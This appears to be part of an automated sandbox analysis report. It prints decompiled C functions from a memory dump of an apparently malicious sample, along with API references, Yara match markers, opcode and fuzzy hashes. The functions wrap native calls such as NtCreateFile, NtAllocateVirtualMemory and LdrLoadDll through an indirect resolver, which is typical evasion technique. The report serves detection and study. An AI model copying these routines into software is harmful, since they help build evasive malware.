				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x0041826f
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409B10(void* __eax, void* _a4, void* _a8) {
				void* _v5;
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t17;
				struct _OBJDIR_INFORMATION _t19;
				struct _OBJDIR_INFORMATION _t20;
				void* _t33;
				void* _t34;
				void* _t35;

				_push(0x104);
				_push( &_v12);
				_v8 =  &_v536;
				_t17 = E0041AB40();
				_t34 = _t33 + 0xc;
				if(_t17 != 0) {
					_t19 = E0041AF60(__eflags, _v8);
					_t35 = _t34 + 4;
					__eflags = _t19;
					if(_t19 != 0) {
						E0041B1E0( &_v12, 0);
						_t35 = _t35 + 8;
					}
					_t20 = E004192F0(_v8);
					_v16 = _t20;
					__eflags = _t20;
					if(_t20 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t20;
				} else {
					return _t17;
				}
			}

0x00409b26
0x00409b2b
0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181AA, Relevance: 1.5, APIs: 1, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004181AA(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("adc dword [ebp-0x2cfe3a4f], 0x8bec8b55");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181aa
0x004181b3
0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 37ea7cbf187f3bbdd21c094d75af695bce8c97b7fed3748cd55249d84c62ff81
Instruction ID: ab9cb67d32c706cefc1ce9ce5efed8057405b4578743ffddfbe15f69fd5cd0a1
Opcode Fuzzy Hash: 37ea7cbf187f3bbdd21c094d75af695bce8c97b7fed3748cd55249d84c62ff81
Instruction Fuzzy Hash: 24F0C4B2214149ABCB48CF98D884CEB77A9FF8C754B15864DFA1DA3202D634E8558BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("in al, dx");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182e2
0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E2, Relevance: 1.5, APIs: 1, Instructions: 19
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004182E2() {
				long _t8;
				void* _t11;
				void* _t15;

				asm("in al, dx");
				_t5 =  *((intOrPtr*)(_t15 + 8));
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11,  *((intOrPtr*)(_t15 + 8)), _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose( *(_t15 + 0xc)); // executed
				return _t8;
			}

0x004182e2
0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4d5e2dbbd0041423f9aaaba988b541f8f48cccb66c2812eccf193562f7620ca8
Instruction ID: 5b8c99b47e0daa8b20f6a2ace526ea1dbbc311f760abb62cf618cdde4ac16014
Opcode Fuzzy Hash: 4d5e2dbbd0041423f9aaaba988b541f8f48cccb66c2812eccf193562f7620ca8
Instruction Fuzzy Hash: 61D05B752002107FD710DF94DC45FD77B58EF44350F154559BA1CDB241C530E50087D0

Uniqueness

Uniqueness Score: -1.00%

Function 017F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F991A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6c2708dda2be760c744d6489950c2ec9be27e3bd7d8cab3c32cef5d642cbe424
Instruction ID: c215d56c82d183c3102e13118a50a494f844082daa8f5aa7f24e3b63d0e1323d
Opcode Fuzzy Hash: 6c2708dda2be760c744d6489950c2ec9be27e3bd7d8cab3c32cef5d642cbe424
Instruction Fuzzy Hash: 4F9002B120100802D18171D948047460005A7D1341F51C111A6058668EC6D98ED976A5

Uniqueness

Uniqueness Score: -1.00%

Function 017F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F99AA

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5eb3c2ee0e9c502a356955d1a8ecf2742c72e0ebdf89e2d5fa78ae7e96e4d0a
Instruction ID: 44c79863c8d8c816161e209b60cc92ec9e1a0fd5c838652de744dd0224302905
Opcode Fuzzy Hash: f5eb3c2ee0e9c502a356955d1a8ecf2742c72e0ebdf89e2d5fa78ae7e96e4d0a
Instruction Fuzzy Hash: 869002A134100842D14161D94814B060005E7E2341F51C115E2058668DC699CD567166

Uniqueness

Uniqueness Score: -1.00%

Function 017F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F986A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 10b20414eec17cd291ff9fbe1fc9e4f6e6ade1d3b70f7d1222ee138354f09bd1
Instruction ID: ec3f53eff2a56e6c0b596154e94e8cba80b57a3125f29a8be34795ea518a60b0
Opcode Fuzzy Hash: 10b20414eec17cd291ff9fbe1fc9e4f6e6ade1d3b70f7d1222ee138354f09bd1
Instruction Fuzzy Hash: 1A90027120100813D15261D949047070009A7D1381F91C512A141866CDD6D68A56B161

Uniqueness

Uniqueness Score: -1.00%

Function 017F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F984A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fd0b1a6838b32cc743eaeaf756ef755ef90bd327d259572ef27e8e10d061f10
Instruction ID: 059f6dd1425e2d932f60189cd5b35d7b5eafe29bb37fd47f83b14eff847a594f
Opcode Fuzzy Hash: 3fd0b1a6838b32cc743eaeaf756ef755ef90bd327d259572ef27e8e10d061f10
Instruction Fuzzy Hash: ED900261242045525586B1D948045074006B7E1381791C112A2408A64CC5A6995AE661

Uniqueness

Uniqueness Score: -1.00%

Function 017F98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F98FA

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a40ee31ebec050f1b8677b6fffb765f4ab3c5f61a8f42388035426fe757105a8
Instruction ID: 4a54efbd670b10b0a43791f400b024926295ef1f0a60ff6381e30fe6b4a4bfd1
Opcode Fuzzy Hash: a40ee31ebec050f1b8677b6fffb765f4ab3c5f61a8f42388035426fe757105a8
Instruction Fuzzy Hash: E190026160100902D14271D94804616000AA7D1381F91C122A2018669ECAA58A96B171

Uniqueness

Uniqueness Score: -1.00%

Function 017F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F9A5A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2e55809ff2c576548c79f30405c9445a0a7611ac4158f76d486ef07dc4eccfa
Instruction ID: 465ffc665ef77fb2d3269130ec8533b5f5951d386c28e16ae9df96814200fbfe
Opcode Fuzzy Hash: b2e55809ff2c576548c79f30405c9445a0a7611ac4158f76d486ef07dc4eccfa
Instruction Fuzzy Hash: 4490026121180442D24165E94C14B070005A7D1343F51C215A1148668CC99589656561

Uniqueness

Uniqueness Score: -1.00%

Function 017F9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F9A2A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa6e866c76751d4c985cd0d95b61166cb1944a4876249fc068ce02a50004d6b0
Instruction ID: ee79b855dbe10269ea1cd03a23a60983d194dc9fdf3e81c681ab449ce8f7be20
Opcode Fuzzy Hash: fa6e866c76751d4c985cd0d95b61166cb1944a4876249fc068ce02a50004d6b0
Instruction Fuzzy Hash: 6A90026160100442418171E98C449064005BBE2351751C221A198C664DC5D9896966A5

Uniqueness

Uniqueness Score: -1.00%

Function 017F9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F9A0A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19207099c4e7e196102e6dadaa2425c60251b69868600dd25e2381ec05fb4f3a
Instruction ID: ac576ef2b52785e7a398d064762d097e6e246b94f351b1830ea8302cefa1d95f
Opcode Fuzzy Hash: 19207099c4e7e196102e6dadaa2425c60251b69868600dd25e2381ec05fb4f3a
Instruction Fuzzy Hash: 1090027120140802D14161D94C1470B0005A7D1342F51C111A2158669DC6A5895575B1

Uniqueness

Uniqueness Score: -1.00%

Function 017F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F954A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a501924ef0a8c5b984ce021433b3ad150298189a9e7fd274c393f46668b6c79
Instruction ID: 4d20fd2d392a42b307a86a837961584cda99be159c9adac83e836123c2e4e805
Opcode Fuzzy Hash: 6a501924ef0a8c5b984ce021433b3ad150298189a9e7fd274c393f46668b6c79
Instruction Fuzzy Hash: 6C900265211004030146A5D90B045070046A7D6391351C121F2009664CD6A189656161

Uniqueness

Uniqueness Score: -1.00%

Function 017F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F95DA

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ec1d00fc24d00d0f56079b7ab13f35b1695bbd249857d0866c758911bbc0eec
Instruction ID: ff7bc77100ce0e0f80a7cb0fb8a88298e7981b882e53860879aede43f99ed4b9
Opcode Fuzzy Hash: 2ec1d00fc24d00d0f56079b7ab13f35b1695bbd249857d0866c758911bbc0eec
Instruction Fuzzy Hash: BC9002A120200403414671D94814616400AA7E1341B51C121E20086A4DC5A589957165

Uniqueness

Uniqueness Score: -1.00%

Function 017F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F971A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23bc96aebf51bf6d467de140e808df389094920c7f42013becaa12e70e4ab881
Instruction ID: ef332ff03f9e19f98d73ae487e3f8a3de6cb065754ad472895e9f0ba570f1169
Opcode Fuzzy Hash: 23bc96aebf51bf6d467de140e808df389094920c7f42013becaa12e70e4ab881
Instruction Fuzzy Hash: 7290027120100802D14165D958086460005A7E1341F51D111A6018669EC6E589957171

Uniqueness

Uniqueness Score: -1.00%

Function 017F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F9FEA

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b028c0108eca399bf9cc150f05bdb90c040a749cf37925b8060820fc1c78d365
Instruction ID: 4101cf315474823431ab073f752a000ece916309b0268fd8921720799e207aff
Opcode Fuzzy Hash: b028c0108eca399bf9cc150f05bdb90c040a749cf37925b8060820fc1c78d365
Instruction Fuzzy Hash: D890027131114802D15161D988047060005A7D2341F51C511A181866CDC6D589957162

Uniqueness

Uniqueness Score: -1.00%

Function 017F97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F97AA

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f58b575ecee163adac69235fe6e766288047561d5934f22853ad8eafabcd5a3f
Instruction ID: affd6df2791422bf8b4775752f759a36685146bc099784c8d8b4ff5799b39a28
Opcode Fuzzy Hash: f58b575ecee163adac69235fe6e766288047561d5934f22853ad8eafabcd5a3f
Instruction Fuzzy Hash: 0D90026130100403D18171D958186064005F7E2341F51D111E1408668CD995895A6262

Uniqueness

Uniqueness Score: -1.00%

Function 017F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F978A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34814250abab0be8a30d88d324dcd6118e24a0142be4e61879f78959a32324f0
Instruction ID: cf8e1556194da003ea9f75a65d19b3902411b230a91896da3262b732fe2e0d5e
Opcode Fuzzy Hash: 34814250abab0be8a30d88d324dcd6118e24a0142be4e61879f78959a32324f0
Instruction Fuzzy Hash: D090026921300402D1C171D9580860A0005A7D2342F91D515A100966CCC995896D6361

Uniqueness

Uniqueness Score: -1.00%

Function 017F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F966A

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0d5cdc4871cebebf1c4e225344e3f42b030fc93ac9ade5d80f174d65bb424570
Instruction ID: 37d7cf077b1a7a83039cfa513aab8ae58cf3dfec0f579dd504c103aac7b4e991
Opcode Fuzzy Hash: 0d5cdc4871cebebf1c4e225344e3f42b030fc93ac9ade5d80f174d65bb424570
Instruction Fuzzy Hash: 8390027120100C02D1C171D9480464A0005A7D2341F91C115A1019768DCA958B5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 017F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F96EA

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 548a0dab4aa92e0d29348fa43ea8cd17b0a6a1258e13d56b0ba8a5f08ea0b9c6
Instruction ID: 373577ee14d202c8e874eedf36065dea3731e3d33775fdd97901235384034292
Opcode Fuzzy Hash: 548a0dab4aa92e0d29348fa43ea8cd17b0a6a1258e13d56b0ba8a5f08ea0b9c6
Instruction Fuzzy Hash: 0B90027120108C02D15161D9880474A0005A7D1341F55C511A541876CDC6D589957161

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				_t12 = E00409B10(E0041A8F0( &_v68, 3), _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					goto L4;
				}
				return _t13;
			}

0x0040726f
0x00407273
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072dd
0x00000000
0x004072dd
0x004072db
0x00000000
0x004072db
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004184B2(void* __eax, signed int __ebx, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t15;
				void* _t24;
				intOrPtr _t31;

				 *((intOrPtr*)(__ebx + 0x1931e381 + __ebx * 2)) = _t31;
				asm("sbb ebx, ecx");
				asm("fcom dword [ebp-0x75]");
				_push(_t28);
				_t12 = _a4;
				_t7 = _t12 + 0xc74; // 0xc74
				E00418DB0(_t24, _a4, _t7,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}

0x004184b4
0x004184bd
0x004184bf
0x004184c0
0x004184c3
0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4bcfcab0996b3a49f899ab8711ade84d36059e62ded83e08f960cf8745a4830d
Instruction ID: f9e678ea5ea72d66287593605fa0b376b38db40d5ea69da659ff0b855a7e20e7
Opcode Fuzzy Hash: 4bcfcab0996b3a49f899ab8711ade84d36059e62ded83e08f960cf8745a4830d
Instruction Fuzzy Hash: 5DF030716003046FDB24DFA5DC85EE73768EF84350F104659F9099B291C632E814CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 004185C5, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004185C5(intOrPtr __edx, void* __eflags, intOrPtr _a3, intOrPtr _a7, intOrPtr _a11, WCHAR* _a12, intOrPtr _a15, WCHAR* _a16, intOrPtr _a19, struct _LUID* _a20, intOrPtr _a23, intOrPtr _a27) {
				intOrPtr* _t17;
				int _t20;
				void* _t27;
				void* _t39;
				void* _t40;
				intOrPtr* _t43;
				void* _t45;

				asm("int 0x4d");
				if(__eflags < 0) {
					asm("sbb [edx], cl");
					 *_t17 =  *_t17 + _t17;
					__eflags =  *_t17;
					_push(_t40);
					E00418DB0(_t39, _t17, _t17 + 0xc8c, _t27, 0, 0x46);
					_t20 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
					return _t20;
				} else {
					 *((intOrPtr*)(__edx + 0x104)) = __edx;
					_t21 = _a3;
					_t6 = _t21 + 0xc88; // 0xd8c
					_t43 = _t6;
					E00418DB0(_t39, _a3, _t43,  *((intOrPtr*)(_a3 + 0xa14)), 0, 0x39);
					return  *((intOrPtr*)( *_t43))(_a7, _a11, _a15, _a19, _a23, _a27, _t40, _t45);
				}
			}

0x004185c5
0x004185ca
0x00418628
0x0041862a
0x0041862a
